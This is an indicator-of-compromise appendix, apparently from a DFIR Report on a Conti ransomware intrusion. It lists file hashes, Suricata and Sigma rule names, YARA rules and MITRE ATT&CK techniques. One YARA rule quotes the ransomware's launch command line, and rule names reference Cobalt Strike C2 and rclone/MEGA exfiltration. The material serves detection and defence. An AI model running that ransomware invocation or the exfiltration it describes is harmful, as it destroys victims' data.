5840aa36b70b7c03c25e5e1266c5835b
ea031940b2120551a6abbe125eb0536b9e4f14c8
09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53
rclone.exe
9066cfcf809bb19091509a4d0f15f092
f88a948b0fd137d4b14cf5aec0c08066cb07e08d
9b5d1f6a94ce122671a5956b2016e879428c74964174739b68397b6384f6ee8b

Suricata

ET TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile Response
ETPRO TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile M2
ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software) 
ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent 
ET POLICY HTTP POST to MEGA Userstorage 

Sigma

rclone_execution.yaml 
sysmon_in_memory_powershell.yml 
win_susp_wmic_proc_create_rundll32.yml 
sysmon_abusing_debug_privilege.yml 
win_trust_discovery.yml
win_office_shell.yml
win_mshta_spawn_shell.yml 
win_susp_net_execution.yml
win_susp_regsvr32_anomalies.yml
sysmon_rundll32_net_connections.yml
win_net_enum.yml
win_susp_wmi_execution.yml

Yara

/*
   YARA Rule Set
   Author: TheDFIRReport
   Date: 2021-11-29
   Identifier: 5794
   */

/* Rule Set ----------------------------------------------------------------- */

rule mal_host2_143 {
   meta:
      description = "mal - file 143.dll"
      author = "TheDFIRReport"
      date = "2021-11-29"
      hash1 = "6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610"
   strings:
      $x1 = "object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime:  g:  g=runtime: addr = runtime: base = runtime: gp: gp=" ascii
      $x2 = "slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to palloc" ascii
      $x3 = " to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurrentDirectoryWGetFileA" ascii
      $x4 = "Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuer" ascii
      $x5 = "GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileabi mismatchadvapi32" ascii
      $x6 = "lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnableunexpected f" ascii
      $x7 = "unknown pcws2_32.dll  of size   (targetpc= KiB work,  freeindex= gcwaiting= heap_live= idleprocs= in status  mallocing= ms clock" ascii
      $x8 = "file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negativ" ascii
      $x9 = ".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign requested addresscasg" ascii
      $x10 = "Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overf" ascii
      $x11 = "entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.pushmadvdontneedmheapSpe" ascii
      $x12 = "ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperation c" ascii
      $s13 = "y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierrunt" ascii
      $s14 = "ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total,  [recovered] allocCount  found at *( gcscandone  m->gs" ascii
      $s15 = ".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegc" fullword ascii
      $s16 = "ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS specific errorSetFile" ascii
      $s17 = "mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile already closedfile alr" ascii
      $s18 = "structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \"GetQueuedCompletionStatus_cg" ascii
      $s19 = "garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over mar" ascii
      $s20 = "tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad notifyList sizebad " ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 4000KB and
      1 of ($x*) and all of them
}

rule mal_host1_D8B3 {
   meta:
      description = "mal - file D8B3.dll"
      author = "TheDFIRReport"
      date = "2021-11-29"
      hash1 = "4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6"
   strings:
      $x1 = "object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime:  g:  g=runtime: addr = runtime: base = runtime: gp: gp=" ascii
      $x2 = "slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to palloc" ascii
      $x3 = " to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurrentDirectoryWGetFileA" ascii
      $x4 = "Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuer" ascii
      $x5 = "GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileabi mismatchadvapi32" ascii
      $x6 = "lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnableunexpected f" ascii
      $x7 = "unknown pcws2_32.dll  of size   (targetpc= KiB work,  freeindex= gcwaiting= heap_live= idleprocs= in status  mallocing= ms clock" ascii
      $x8 = "file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negativ" ascii
      $x9 = ".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign requested addresscasg" ascii
      $x10 = "Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overf" ascii
      $x11 = "entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.pushmadvdontneedmheapSpe" ascii
      $x12 = "ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperation c" ascii
      $s13 = "y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierrunt" ascii
      $s14 = "ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total,  [recovered] allocCount  found at *( gcscandone  m->gs" ascii
      $s15 = ".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegc" fullword ascii
      $s16 = "ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS specific errorSetFile" ascii
      $s17 = "mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile already closedfile alr" ascii
      $s18 = "structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \"GetQueuedCompletionStatus_cg" ascii
      $s19 = "garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over mar" ascii
      $s20 = "tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad notifyList sizebad " ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 4000KB and
      1 of ($x*) and all of them
}


rule mal_host2_AnyDesk {
   meta:
      description = "mal - file AnyDesk.exe"
      author = "TheDFIRReport"
      date = "2021-11-29"
      hash1 = "8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7"
   strings:
      $x1 = "<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" pu" ascii
      $x2 = "C:\\Buildbot\\ad-windows-32\\build\\release\\app-32\\win_loader\\AnyDesk.pdb" fullword ascii
      $s3 = "<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" pu" ascii
      $s4 = "<assemblyIdentity version=\"6.3.2.0\" processorArchitecture=\"x86\" name=\"AnyDesk.AnyDesk.AnyDesk\" type=\"win32\" />" fullword ascii
      $s5 = "4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O" fullword ascii
      $s6 = "(Symantec SHA256 TimeStamping Signer - G3" fullword ascii
      $s7 = "(Symantec SHA256 TimeStamping Signer - G30" fullword ascii
      $s8 = "http://ocsp.digicert.com0N" fullword ascii
      $s9 = "http://www.digicert.com/CPS0" fullword ascii
      $s10 = "Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0" fullword ascii
      $s11 = "<description>AnyDesk screen sharing and remote control software.</description>" fullword ascii
      $s12 = "/http://crl3.digicert.com/sha2-assured-cs-g1.crl05" fullword ascii
      $s13 = "/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L" fullword ascii
      $s14 = "%jgmRhZl%" fullword ascii
      $s15 = "5ZW:\"Wfh" fullword ascii
      $s16 = "5HRe:\\" fullword ascii
      $s17 = "ysN.JTf" fullword ascii
      $s18 = "Z72.irZ" fullword ascii
      $s19 = "Ve:\\-Sj7" fullword ascii
      $s20 = "ekX.cFm" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 11000KB and
      1 of ($x*) and 4 of them
}

rule ProcessHacker {
   meta:
      description = "mal - file ProcessHacker.exe"
      author = "TheDFIRReport"
      date = "2021-11-29"
      hash1 = "d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f"
   strings:
      $x1 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" fullword wide
      $x2 = "D:\\Projects\\processhacker2\\bin\\Release32\\ProcessHacker.pdb" fullword ascii
      $x3 = "ProcessHacker.exe" fullword wide
      $x4 = "kprocesshacker.sys" fullword wide
      $x5 = "ntdll.dll!NtDelayExecution" fullword wide
      $x6 = "ntdll.dll!ZwDelayExecution" fullword wide
      $s7 = "PhInjectDllProcess" fullword ascii
      $s8 = "_PhUiInjectDllProcess@8" fullword ascii
      $s9 = "logonui.exe" fullword wide
      $s10 = "Executable files (*.exe;*.dll;*.ocx;*.sys;*.scr;*.cpl)" fullword wide
      $s11 = "\\x86\\ProcessHacker.exe" fullword wide
      $s12 = "user32.dll!NtUserGetMessage" fullword wide
      $s13 = "ntdll.dll!NtWaitForKeyedEvent" fullword wide
      $s14 = "ntdll.dll!ZwWaitForKeyedEvent" fullword wide
      $s15 = "ntdll.dll!NtReleaseKeyedEvent" fullword wide
      $s16 = "ntdll.dll!ZwReleaseKeyedEvent" fullword wide
      $s17 = "\\kprocesshacker.sys" fullword wide
      $s18 = "\\SystemRoot\\system32\\drivers\\ntfs.sys" fullword wide
      $s19 = "_PhExecuteRunAsCommand2@36" fullword ascii
      $s20 = "_PhShellExecuteUserString@20" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 4000KB and
      1 of ($x*) and 4 of them
}

rule unlocker {
   meta:
      description = "mal - file unlocker.exe"
      author = "TheDFIRReport"
      date = "2021-11-29"
      hash1 = "09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53"
   strings:
      $s1 = "For more detailed information, please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline" fullword wide
      $s2 = "(Symantec SHA256 TimeStamping Signer - G20" fullword ascii
      $s3 = "            <requestedExecutionLevel level=\"asInvoker\"            uiAccess=\"false\"/>" fullword ascii
      $s4 = "(Symantec SHA256 TimeStamping Signer - G2" fullword ascii
      $s5 = "Causes Setup to create a log file in the user's TEMP directory." fullword wide
      $s6 = "Prevents the user from cancelling during the installation process." fullword wide
      $s7 = "Same as /LOG, except it allows you to specify a fixed path/filename to use for the log file." fullword wide
      $s8 = "        <dpiAware xmlns=\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\">true</dpiAware>" fullword ascii
      $s9 = "The Setup program accepts optional command line parameters." fullword wide
      $s10 = "Instructs Setup to load the settings from the specified file after having checked the command line." fullword wide
      $s11 = "Overrides the default component settings." fullword wide
      $s12 = "/MERGETASKS=\"comma separated list of task names\"" fullword wide
      $s13 = "/PASSWORD=password" fullword wide
      $s14 = "Specifies the password to use." fullword wide
      $s15 = "yyyyvvvvvvvvvxxw" fullword ascii
      $s16 = "yyyyyyrrrsy" fullword ascii
      $s17 = "            processorArchitecture=\"x86\"" fullword ascii
      $s18 = "    processorArchitecture=\"x86\"" fullword ascii
      $s19 = "Prevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requ" wide
      $s20 = "/DIR=\"x:\\dirname\"" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 7000KB and
      8 of them
}

rule mal_host2_locker {
   meta:
      description = "mal - file locker.bat"
      author = "TheDFIRReport"
      date = "2021-11-29"
      hash1 = "1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3"
   strings:
      $x1 = "_locker.exe -m -net -size 10 -nomutex -p" ascii
   condition:
      uint16(0) == 0x7473 and filesize < 8KB and
      $x1
}

import "pe"

rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker {
   meta:
      description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe"
      author = "The DFIR Report"
      reference = "https://thedfirreport.com"
      date = "2021-11-29"
      hash1 = "9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219"
   strings:
      $s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s2 = "operator co_await" fullword ascii
      $s3 = ">*>6>A>_>" fullword ascii /* hex encoded string 'j' */
      $s4 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
      $s5 = "Bapi-ms-win-core-fibers-l1-1-1" fullword wide
      $s6 = "SVWjEhQ" fullword ascii
      $s7 = ";F;[;l;" fullword ascii /* Goodware String - occured 1 times */
      $s8 = "74787@7H7P7T7\\7p7" fullword ascii /* Goodware String - occured 1 times */
      $s9 = "6#606B6" fullword ascii /* Goodware String - occured 1 times */
      $s10 = "<!=X=u=" fullword ascii /* Goodware String - occured 1 times */
      $s11 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */
      $s12 = "6!7?7J7" fullword ascii /* Goodware String - occured 2 times */
      $s13 = "delete" fullword ascii /* Goodware String - occured 2789 times */
      $s14 = "4!4(4/464=4D4K4R4Z4b4j4v4" fullword ascii /* Goodware String - occured 3 times */
      $s15 = ".CRT$XIAC" fullword ascii /* Goodware String - occured 3 times */
      $s16 = "0#0)01060\\0a0" fullword ascii
      $s17 = ";\";/;=;K;V;l;" fullword ascii
      $s18 = "6,606P6X6\\6x6" fullword ascii
      $s19 = "6(6,6@6D6H6L6P6T6X6\\6`6d6p6t6x6|6" fullword ascii
      $s20 = "8 :M:}:" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 600KB and
      ( pe.imphash() == "50472e0ba953856d228c7483b149ea72" or all of them )
}

rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86 {
   meta:
      description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll"
      author = "The DFIR Report"
      reference = "https://thedfirreport.com"
      date = "2021-11-29"
      hash1 = "01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9"
   strings:
      $s1 = "conti_v3.dll" fullword ascii
      $s2 = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s3 = "6 7/787E7[7" fullword ascii /* hex encoded string 'gx~w' */
      $s4 = "operator co_await" fullword ascii
      $s5 = "2%3.3f3~3" fullword ascii /* hex encoded string '#?3' */
      $s6 = "1\"1&1,:4:<:D:L:T:\\:d:l:t:|:" fullword ascii
      $s7 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
      $s8 = "SVWjEhQ" fullword ascii
      $s9 = "__swift_2" fullword ascii
      $s10 = "__swift_1" fullword ascii
      $s11 = "api-ms-win-core-file-l1-2-2" fullword wide /* Goodware String - occured 1 times */
      $s12 = "7K7P7T7X7\\7" fullword ascii /* Goodware String - occured 1 times */
      $s13 = "7h7o7v7}7" fullword ascii /* Goodware String - occured 1 times */
      $s14 = "O0a0s0" fullword ascii /* Goodware String - occured 1 times */
      $s15 = ";?;I;S;" fullword ascii /* Goodware String - occured 1 times */
      $s16 = "8>8C8Q8V8" fullword ascii /* Goodware String - occured 1 times */
      $s17 = "QQSVj8j@" fullword ascii
      $s18 = "5-5X5s5" fullword ascii /* Goodware String - occured 1 times */
      $s19 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */
      $s20 = "delete" fullword ascii /* Goodware String - occured 2789 times */
   condition:
      uint16(0) == 0x5a4d and filesize < 600KB and
      ( pe.imphash() == "749dc5143e9fc01aa1d221fb9a48d5ea" or all of them )
}

rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64 {
   meta:
      description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll"
      author = "The DFIR Report"
      reference = "https://thedfirreport.com"
      date = "2021-11-29"
      hash1 = "31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a"
   strings:
      $s1 = "conti_v3.dll" fullword ascii
      $s2 = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s3 = "operator co_await" fullword ascii
      $s4 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
      $s5 = "api-ms-win-core-file-l1-2-2" fullword wide /* Goodware String - occured 1 times */
      $s6 = "__swift_2" fullword ascii
      $s7 = "__swift_1" fullword ascii
      $s8 = "expand 32-byte k" fullword ascii /* Goodware String - occured 1 times */
      $s9 = "u3HcH<H" fullword ascii /* Goodware String - occured 2 times */
      $s10 = "D$XD9x" fullword ascii /* Goodware String - occured 2 times */
      $s11 = "delete" fullword ascii /* Goodware String - occured 2789 times */
      $s12 = "ue!T$(H!T$ " fullword ascii
      $s13 = "L$&8\\$&t,8Y" fullword ascii
      $s14 = "F 2-by" fullword ascii
      $s15 = "u\"8Z(t" fullword ascii
      $s16 = "L$ |+L;" fullword ascii
      $s17 = "vB8_(t" fullword ascii
      $s18 = "ext-ms-" fullword wide
      $s19 = "OOxq*H" fullword ascii
      $s20 = "H97u+A" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 600KB and
      ( pe.imphash() == "137fa89046164fe07e0dd776ed7a0191" or all of them )
}

MITRE

T1218.010 - Signed Binary Proxy Execution: Regsvr32
T1218.005 - Signed Binary Proxy Execution: Mshta
T1218.011 - Signed Binary Proxy Execution: Rundll32
T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1105 - Ingress Tool Transfer
T1059.005 - Command and Scripting Interpreter: Visual Basic
T1059.007 - Command and Scripting Interpreter: JavaScript
T1059.001 - Command and Scripting Interpreter: PowerShell
T1055 - Process Injection
T1486 - Data Encrypted for Impact
T1482 - Domain Trust Discovery
T1047 - Windows Management Instrumentation
T1021.002 - Remote Services: SMB/Windows Admin Shares
T1124 - System Time Discovery
T1021.001 - Remote Services: Remote Desktop Protocol
T1566.001 - Phishing: Spearphishing Attachment
T1087.002 - Account Discovery: Domain Account
T1087.001 - Account Discovery: Local Account
T1057 - Process Discovery
T1083 - File and Directory Discovery
T1590.005 - Gather Victim Network Information: IP Addresses

MITRE Software

Net – S0039
Nltest – S0359
Cmd – S0106
Tasklist – S0057
Cobalt Strike – S0154
AdFind - S0552

Published by Seebug Paper; please credit the source when reproducing. Article link: http://www.bjnorthway.com/1774/